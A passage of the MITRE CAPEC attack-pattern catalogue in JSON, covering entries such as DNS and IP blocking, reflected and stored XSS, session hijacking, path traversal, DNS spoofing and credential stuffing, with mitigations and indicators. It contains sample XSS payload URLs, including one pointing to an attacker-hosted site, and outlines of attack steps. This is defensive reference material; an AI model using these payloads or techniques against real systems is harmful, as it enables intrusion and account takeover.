Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"589":{"ID":"589","Name":"DNS Blocking","Abstraction":"Detailed","Status":"Draft","Description":"An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"603","Exclude_Related":{"Exclude_ID":"514"}}},"Prerequisites":{"Prerequisite":"This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Preventing DNS from resolving a request denies the availability of a target site or service for the user."}},"Mitigations":{"Mitigation":["Hard Coded Alternate DNS server in applications","Avoid dependence on DNS","Include \\"hosts file\\"/IP address in the application.","Ensure best practices with respect to communications channel protections.","Use a .onion domain with Tor support"]},"Example_Instances":{"Example":{"p":["Full URL Based Filtering: Filtering based upon the requested URL.","URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL."]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"References":{"Reference":{"External_Reference_ID":"REF-473"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"590":{"ID":"590","Name":"IP Address Blocking","Abstraction":"Detailed","Status":"Draft","Description":"An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"603","Exclude_Related":{"Exclude_ID":"514"}}},"Prerequisites":{"Prerequisite":"This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Blocking packets intended for a target IP address denies its availability to the user."}},"Mitigations":{"Mitigation":"Have a large pool of backup IPs built into the application and support proxy capability in the application."},"Example_Instances":{"Example":"Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"References":{"Reference":{"External_Reference_ID":"REF-475"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"}]}},"591":{"ID":"591","Name":"Reflected XSS","Abstraction":"Detailed","Status":"Stable","Description":"This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \\"reflected\\" off a vulnerable web application and then executed by a victim\'s browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application. The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"63"}},"Prerequisites":{"Prerequisite":["An application that leverages a client-side web browser with scripting enabled.","An application that fail to adequately sanitize or encode untrusted input."]},"Skills_Required":{"Skill":["Requires the ability to write malicious scripts and embed them into HTTP requests.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application."},{"Scope":["Confidentiality","Authorization","Access Control"],"Impact":"Gain Privileges","Note":"A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application."},{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful Reflected attack can allow an adversary to tamper with application data."}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client-side scripting.","Utilize strict type, character, and encoding enforcement.","Ensure that all user-supplied input is validated before use."]},"Example_Instances":{"Example":[{"p":["Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.","The application\u2019s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.","Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:"],"div":["http://my.site.com/aform.html?mode=full",{"style":"margin-left:10px;","class":"informative"},"<?php",{"style":"margin-left:10px;","class":"informative"},"http://my.site.com/aform.html?mode=<script>alert(\'hi\');<\/script>",{"style":"margin-left:10px;","class":"attack"}]},{"p":["Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called \u2018mysite\u2019 dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:","The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker\u2019s web page, such as:","The vulnerable web application (\'mysite\') is now called via the attacker\'s web site, initiated by the victim\'s web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim\u2019s web browser then executes the injected script, thus compromising the victim\u2019s machine."],"div":["<?php",{"style":"margin-left:10px;","class":"informative"},"\\"http://attackerswebsite.com?<script>malicious content<\/script>\\"",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"79"}},"References":{"Reference":[{"External_Reference_ID":"REF-476"},{"External_Reference_ID":"REF-604","Section":"Testing for Reflected Cross Site Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"592":{"ID":"592","Name":"Stored XSS","Abstraction":"Detailed","Status":"Stable","Description":"This type of attack is a form of Cross-site Scripting (XSS) where a malicious script is persistenly \\"stored\\" within the data storage of a vulnerable web application. Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim\'s browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"63"}},"Prerequisites":{"Prerequisite":["An application that leverages a client-side web browser with scripting enabled.","An application that fails to adequately sanitize or encode untrusted input.","An application that stores information provided by the user in data storage of some kind."]},"Skills_Required":{"Skill":["Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful Stored XSS attack can enable an adversary to exfiltrate sensitive information from the application."},{"Scope":["Confidentiality","Authorization","Access Control"],"Impact":"Gain Privileges","Note":"A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application."},{"Scope":"Integrity","Impact":"Modify Data","Note":"A successful Stored XSS attack can allow an adversary to tamper with application data."}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client-side scripting.","Utilize strict type, character, and encoding enforcement.","Ensure that all user-supplied input is validated before being stored."]},"Example_Instances":{"Example":["An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator\'s authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.","An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of their message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim\'s browser."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"79"}},"References":{"Reference":{"External_Reference_ID":"REF-605","Section":"Testing for Stored Cross Site Scripting"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"593":{"ID":"593","Name":"Session Hijacking","Abstraction":"Standard","Status":"Stable","Description":"This type of attack involves an adversary that exploits weaknesses in an application\'s use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"21"}},"Prerequisites":{"Prerequisite":"An application that leverages sessions to perform authentication."},"Skills_Required":{"Skill":["Exploiting a poorly protected identity token is a well understood attack with many helpful resources available.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The adversary must have the ability to communicate with the application over the network."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Gain Privileges","Note":"A successful attack can enable an adversary to gain unauthorized access to an application."}},"Mitigations":{"Mitigation":"Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. If the user logs back in then a new session key should be generated."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.001","Entry_Name":"Use Alternate Authentication Material:Application Access Token"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1563","Entry_Name":"Remote Service Session Hijacking"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Session hijacking attack"}]},"References":{"Reference":{"External_Reference_ID":"REF-603","Section":"Testing for Session Hijacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-04-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"594":{"ID":"594","Name":"Traffic Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary injects traffic into the target\'s network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.","Prerequisites":{"Prerequisite":["The target application must leverage an open communications channel.","The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)."]},"Resources_Required":{"Resource":"A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution","Note":"The injection of specific content into a connection can trigger a disruption in that communications channel, thereby denying availability of the service."},{"Scope":"Integrity","Impact":"Other","Note":"An adversary\'s injection of additional content into a communication channel negatively impacts the integrity of that channel."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"940"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-03"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Prerequisites"}]}},"595":{"ID":"595","Name":"Connection Reset","Abstraction":"Standard","Status":"Draft","Description":"In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target\'s connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"594"}},"Prerequisites":{"Prerequisite":"This attack requires the ability to monitor the target\'s network connection."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"940"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-04"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"596":{"ID":"596","Name":"TCP RST Injection","Abstraction":"Detailed","Status":"Draft","Description":"An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"595"}},"Prerequisites":{"Prerequisite":"An On/In Path Device"},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"940"}},"References":{"Reference":{"External_Reference_ID":"REF-477"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-03"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"597":{"ID":"597","Name":"Absolute Path Traversal","Abstraction":"Detailed","Status":"Draft","Description":"An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \\"..\\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"126"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey application] Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.","Technique":["Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore a website and analyze how it is constructed. Many browser\'s plug-in are available to facilitate the analysis or automate the URL discovery."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt variations on input parameters] Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.","Technique":["Access common files in root directories such as \\"/bin\\", \\"/boot\\", \\"/lib\\", or \\"/home\\"","Access a specific drive letter or windows volume letter by specifying \\"C:dirname\\" for example","Access a known Windows UNC share by specifying \\"\\\\\\\\UNC\\\\share\\\\name\\" for example"]},{"Step":"4","Phase":"Exploit","Description":"[Access, modify, or execute arbitrary files.] An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.","Technique":["Manipulate file and its path by injecting absolute path sequences (e.g. \\"/home/file.txt\\").","Download files, modify files, or try to execute shell commands (with binary files)."]}]},"Prerequisites":{"Prerequisite":"The target must leverage and access an underlying file system."},"Skills_Required":{"Skill":["Simple command line attacks.",{"Level":"Low"},"Programming attacks.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results."},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Data","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"Unreliable Execution","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Mitigations":{"Mitigation":["Design: Configure the access control correctly.","Design: Enforce principle of least privilege.","Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.","Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.","Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.","Implementation: Perform input validation for all remote content, including remote and user-generated content.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.","Implementation: Use indirect references rather than actual file names.","Implementation: Use possible permissions on file access when developing and deploying web applications.","Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification using an allowlist approach."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"36"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2017-01-06"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"598":{"ID":"598","Name":"DNS Spoofing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary sends a malicious (\\"NXDOMAIN\\" (\\"No such domain\\") code, or DNS A record) response to a targets route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the targets DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the targets infrastructure uses.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"On/In Path Device"},"Skills_Required":{"Skill":["To distribute email",{"Level":"Low"}]},"Mitigations":{"Mitigation":["Design: Avoid dependence on DNS","Design: Include \\"hosts file\\"/IP address in the application","Implementation: Utilize a .onion domain with Tor support","Implementation: DNSSEC","Implementation: DNS-hold-open"]},"Example_Instances":{"Example":["Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious (\\"NXDOMAIN\\" (\\"No such domain\\") code, or DNS A record ) response before a legitimate resolver can.","Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\\"NXDOMAIN\\" (\\"No such domain\\")code, or a DNS record) response before a legitimate resolver can."]},"References":{"Reference":[{"External_Reference_ID":"REF-477"},{"External_Reference_ID":"REF-479"}]},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-04"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"599":{"ID":"599","Name":"Terrestrial Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, the adversary transmits disruptive signals in the direction of the target consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"195","Exclude_Related":{"Exclude_ID":"513"}}},"Resources_Required":{"Resource":{"p":["A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.","The adversary must know the location of the target satellite dish."]}},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"A successful attack will deny, degrade, or disrupt availability of satellite communications for the target by overwhelming its resources to accurately receive authorized transmissions."}},"Example_Instances":{"Example":"An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary."},"References":{"Reference":{"External_Reference_ID":"REF-462"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"600":{"ID":"600","Name":"Credential Stuffing","Abstraction":"Standard","Status":"Stable","Description":{"p":["An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services. Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform. If the password obtained by the adversary is used for multiple systems, accounts, and/or services, this attack will be successful (in the absence of other mitigations).","Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user\'s password history for an account.","Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known credentials] The adversary must obtain known credentials in order to access the target system, application, or service.","Technique":["An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.","An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.","An adversary conducts a sniffing attack to steal credentials as they are transmitted.","An adversary gains access to a database and exfiltrates password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded credentials."]},{"Step":"2","Phase":"Explore","Description":"[Determine target\'s password policy] Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account)."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt authentication] Try each username/password combination until the target grants access.","Technique":"Manually or automatically enter each username/password combination through the target\'s interface."},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into a victim user\'s system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within the system or application."}]},"Prerequisites":{"Prerequisite":["The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target."]},"Skills_Required":{"Skill":["A Credential Stuffing attack is very straightforward.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A machine with sufficient resources for the job (e.g. CPU, RAM, HD).","A known list of username/password combinations.","A custom script that leverages the credential list to launch the attack."]},"Indicators":{"Indicator":["Many invalid login attempts are coming from the same machine (same IP address) or for multiple user accounts within short succession.","The login attempts use passwords that have been used previously by the user account in question.","Login attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Create a strong password policy and ensure that your system enforces this policy.","Ensure users are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["A 